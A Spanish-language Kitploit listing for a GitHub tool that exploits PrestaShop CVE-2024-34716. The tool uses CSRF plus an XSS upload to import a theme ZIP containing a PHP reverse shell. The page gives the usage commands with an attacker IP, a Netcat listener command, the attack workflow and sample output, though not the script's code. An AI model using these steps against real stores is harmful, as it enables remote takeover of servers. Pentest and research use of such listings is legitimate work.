Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Prestashop-CVE-2024-34716 — Automatiza un ataque CSRF contra CVE-2024-34716 para desplegar una reverse shell en PHP en PrestaShop, con empaquetado automatizado del payload y configuración del listener de Netcat. | Kitploit
Herramientas/GitHubGitHub/0xdtc/prestashop-cve-2024-34716
Generación de PayloadsExplotaciónShellcodeExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHub0xdtc/prestashop-cve-2024-34716

Prestashop-CVE-2024-34716

Automatiza un ataque CSRF contra CVE-2024-34716 para desplegar una reverse shell en PHP en PrestaShop, con empaquetado automatizado del payload y configuración del listener de Netcat.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
111hace 1 añoAún no revisado
Compartir

Script de Explotación para Ataque CSRF y Reverse Shell

Este script automatiza un exploit de CSRF (Falsificación de Petición en Sitios Cruzados) para cargar un reverse shell PHP en el servidor web de un objetivo y ejecutarlo. El reverse shell se entrega como un archivo ZIP mediante un payload CSRF diseñado, que se activa cuando un usuario privilegiado interactúa con un endpoint específico. El script requiere una instancia de Netcat a la escucha para capturar la conexión del reverse shell.

Parece estar roto por ahora, se actualizará más tarde

Requisitos

  • Netcat: Asegúrate de que Netcat esté instalado y pueda escuchar en un puerto especificado (por defecto: 9001).
  • Python 3: Se utiliza para servir archivos a través de HTTP.
  • Curl y JQ: Se utilizan para obtener y manejar peticiones HTTP y análisis JSON.

Uso

root@kitploit:~
./exploit.sh <target_url> <admin_endpoint> <admin_email> <attacker_ip>

Argumentos

  • target_url: URL base del objetivo (ej., https://example.com).
  • admin_endpoint: Ruta al endpoint de importación de tema del administrador.
  • admin_email: Dirección de correo de un administrador (para suplantar en el payload).
  • attacker_ip: Dirección IP donde el listener del reverse shell recibirá la conexión.

Ejemplo

root@kitploit:~
./exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10

Flujo de Trabajo del Exploit

  1. Creación del Reverse Shell: Genera un reverse shell PHP usando revshells.com con la attacker_ip y el puerto 9001 proporcionados.
  2. Empaquetado ZIP: El script del reverse shell (love.php) se comprime en Love-exploit.zip.
  3. Obtención del Token CSRF: Recupera el token CSRF del objetivo para autorizar la solicitud de importación del tema.
  4. Construcción del Payload HTML: Construye un payload HTML (csrf_payload.html) que contiene un script JavaScript para enviar automáticamente una solicitud maliciosa al panel de administración del objetivo e importar el reverse shell.
  5. Configuración del Servidor HTTP: Un servidor HTTP temporal en el puerto 8000 sirve Love-exploit.zip para que el objetivo lo importe.
  6. Carga XSS y Activación CSRF: El payload CSRF se carga en la página de contacto del objetivo. Al acceder a él, desencadena el ataque CSRF.
  7. Listener del Reverse Shell: El atacante monitorea las conexiones entrantes de la víctima usando Netcat.

Pasos de Ejecución

  1. Inicia un listener de Netcat en tu máquina:

    root@kitploit:~
    nc -nvlp 9001
    
  2. Ejecuta el script:

    root@kitploit:~
    ./exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10
    
  3. Espera a que el objetivo ejecute el payload CSRF y recibe la conexión del reverse shell.

Salida

El script muestra la siguiente información durante la ejecución:

  • Estado de obtención del token CSRF.
  • Estado de creación y empaquetado del reverse shell.
  • Estado de entrega del payload y estado del servidor HTTP.

Notas Importantes

  • Permisos: Este script requiere permiso para ejecutarse en el servidor objetivo. El uso no autorizado es ilegal y castigado por la ley.
  • Entorno de Pruebas: Úsalo solo en un entorno controlado y autorizado, como un laboratorio de ciberseguridad.
  • Conflictos de Puertos: Asegúrate de que los puertos 8000 (servidor HTTP) y 9001 (listener de Netcat) estén libres antes de ejecutar el script.

Ejemplo de Salida

root@kitploit:~
[*] Ensure Netcat is listening: nc -nvlp 9001
[*] Awaiting netcat listener...
[*] Creating PHP reverse shell...
[*] Packaging shell as Love-exploit.zip...
[*] Fetching CSRF token...
[+] CSRF token retrieved: <token_value>
[*] Building HTML payload for CSRF...
[*] Converting HTML to PNG...
[*] Checking for existing HTTP server on port 8000...
[*] Starting new HTTP server on port 8000 for payload delivery...
[*] Uploading XSS payload to trigger CSRF...
[*] Keeping script running to monitor for incoming connections...

Este documento está destinado al uso por parte de probadores de penetración e investigadores de ciberseguridad en entornos controlados. El mal uso de esta herramienta para fines no autorizados está estrictamente prohibido.


Descargo de Responsabilidad

Este script es solo para fines educativos y evaluaciones legales de ciberseguridad. El uso no autorizado contra un sistema sin permiso es ilegal y va en contra de las pautas éticas.

Descargar herramienta